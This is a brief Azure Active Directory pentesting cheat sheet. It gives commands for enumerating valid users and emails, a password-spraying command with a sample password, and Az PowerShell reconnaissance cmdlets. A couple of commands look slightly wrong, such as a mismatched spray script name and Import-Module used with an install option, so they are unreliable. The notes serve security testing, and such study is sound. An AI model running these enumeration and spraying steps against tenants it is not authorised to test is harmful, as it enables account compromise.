Pentesting Azure Active Directory
Unauthenticated Recon
User Email Enumeration
python3 onedrive_enum.py -U users.txt -d companyname.com -v
If the output urls gave us 404 File Not Found
, that mean it's a bad/invalid users or
If it redirect to sigin page, that mean it's a valid user account.
Valid Email Enumeration
python3 o365creeper.py -e test@email.com
python3 o365creeper.py -f email-list.txt -o validated-out-file.txt
Cloud Enum
python3 cloud_enum.py -k tesla --disable-aws --disable-gcp
Password Spraying
Import-Module .\MSQLSpray.ps1
Invoke-MSOLSpray -UserList .\mails.txt.txt -Password P@ssword123

Authenticated Recon
First, we need to install Azure Az powershell module
Import-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force
Connect Azure account with Connect-AzAccount

Enumerating with Powershell
# List current users context available
Get-AzContext -ListAvailable
# Getting subscription
Get-AzSubscription
# Current user's role assignment
Get-AzRoleAssignment
# List all the resources and group
Get-AzResource
Get-AzResourceGroup
# List storage accounts
Get-AzStorageAccount
# List all WebApp for exploit
Get-AzWebApp
# List Automation Account
Get-AzAutomationAccount
# Display all the virtual network
Get-AzVirtualNetwork
# Getting public ip address
Get-AzPublicIpAddress
Continues...
Last updated